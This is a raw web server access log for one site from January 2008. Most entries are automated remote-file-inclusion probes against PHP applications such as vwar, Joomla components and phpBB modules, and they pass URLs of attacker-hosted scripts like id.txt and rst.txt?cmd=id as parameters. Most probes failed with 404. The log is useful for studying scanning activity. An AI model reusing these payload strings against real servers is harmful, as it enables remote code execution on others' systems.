212.143.172.133 - - [22/Jan/2008:19:26:24 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:19:27:09 -0800] "GET /logs/config.inc.php?path_escape=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:19:27:09 -0800] "GET /config.inc.php?path_escape=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:28:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:28:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:28:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.211.107.26 - - [22/Jan/2008:19:28:33 -0800] "GET /logs//include/write.php?dir=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.211.107.26 - - [22/Jan/2008:19:28:33 -0800] "GET //include/write.php?dir=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:29:49 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:29:49 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:29:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:31:22 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:32:56 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:32:56 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:32:57 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.47.14.113 - - [22/Jan/2008:19:33:01 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:33:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:33:58 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:34:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:34:31 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:34:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:34:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:34:37 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:34:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:19:34:38 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:38:02 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:38:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:38:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:19:39:13 -0800] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:19:39:14 -0800] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
195.56.111.194 - - [22/Jan/2008:19:42:21 -0800] "GET /logs/index.php?go=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.56.111.194 - - [22/Jan/2008:19:42:21 -0800] "GET /index.php?go=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:19:45:04 -0800] "GET /logs/access_071230.log/index1.php?choix=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:19:45:05 -0800] "GET /index1.php?choix=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.73.27.10 - - [22/Jan/2008:19:45:05 -0800] "GET /logs/index1.php?choix=www.freewebs.com/xplproxysx???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:46:14 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:19:46:42 -0800] "GET /smarty.php?xcart_dir=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:19:46:45 -0800] "GET /logs/smarty.php?xcart_dir=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
201.47.14.113 - - [22/Jan/2008:19:50:41 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:19:51:44 -0800] "GET /logs//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:19:51:44 -0800] "GET //header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:52:01 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:53:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:53:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:54:31 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:54:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:54:32 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:54:58 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:55:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:55:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.109 - - [22/Jan/2008:19:56:34 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:19:56:34 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:56:46 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:57:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:19:57:38 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:57:58 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:57:58 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:19:57:59 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.172.133 - - [22/Jan/2008:20:00:04 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:00:05 -0800] "GET /logs/access.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:00:42 -0800] "GET /logs/access_071220.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:20:01:12 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:20:01:13 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:02:14 -0800] "GET /index.php?body=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:02:42 -0800] "GET /logs/access_071222.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:20:04:10 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:20:04:10 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [22/Jan/2008:20:04:10 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:05:21 -0800] "GET /logs/access.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:05:22 -0800] "GET //header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:05:22 -0800] "GET /logs//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:05:59 -0800] "GET /logs/access_071220.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:07:22 -0800] "GET /logs/access_071225.log/index.php?body=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:07:22 -0800] "GET /logs/index.php?body=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:20:07:42 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:20:07:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:20:07:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:08:06 -0800] "GET /logs/access.log/index.php?body=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.48.42.218 - - [22/Jan/2008:20:08:26 -0800] "GET /logs/access_071222.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.111.194 - - [22/Jan/2008:20:08:55 -0800] "GET /index.php?pg=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.56.111.194 - - [22/Jan/2008:20:08:55 -0800] "GET /logs/index.php?pg=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:09:18 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:09:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:10:20 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:10:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:10:30 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:13:03 -0800] "GET /logs/access_071018.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:13:03 -0800] "GET /logs/access_071224.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:13:09 -0800] "GET /logs/access_071218.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.68.217.6 - - [22/Jan/2008:20:13:19 -0800] "GET //modules/My_eGallery/index.php?basepath=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:20:13:33 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:20:13:33 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
86.109.104.68 - - [22/Jan/2008:20:15:08 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
86.109.104.68 - - [22/Jan/2008:20:15:08 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:15:52 -0800] "GET /logs/access_071214.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.28.224 - - [22/Jan/2008:20:16:04 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.214.28.224 - - [22/Jan/2008:20:16:04 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
88.166.35.71 - - [22/Jan/2008:20:16:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.166.35.71 - - [22/Jan/2008:20:16:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:17:58 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:18:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.166.35.71 - - [22/Jan/2008:20:19:28 -0800] "GET //skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:21:20 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [22/Jan/2008:20:23:49 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.140.91.131 - - [22/Jan/2008:20:25:39 -0800] "GET /logs/access_071219.log//header.php?base_folder=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:20:26:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:20:26:29 -0800] "GET /minamijewelry/html/images/jewelry/flower.jpg HTTP/1.0" 200 6031 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:27:22 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:20:33:01 -0800] "GET /minamijewelry/html/about.html HTTP/1.0" 200 12859 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
88.166.35.71 - - [22/Jan/2008:20:33:06 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:38:09 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:38:09 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [22/Jan/2008:20:38:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.194.74.238 - - [22/Jan/2008:20:39:06 -0800] "GET //index.php?option=com_jrecache&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
82.194.74.238 - - [22/Jan/2008:20:39:06 -0800] "GET /logs//index.php?option=com_jrecache&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.172.125.119 - - [22/Jan/2008:20:40:13 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:20:40:31 -0800] "GET /minamijewelry/html/images/jewelry/dream.jpg HTTP/1.0" 200 5528 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.25.73 - - [22/Jan/2008:20:42:36 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.13.149 - - [22/Jan/2008:20:43:14 -0800] "GET /logs//index.php?option=com_jrecache&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.c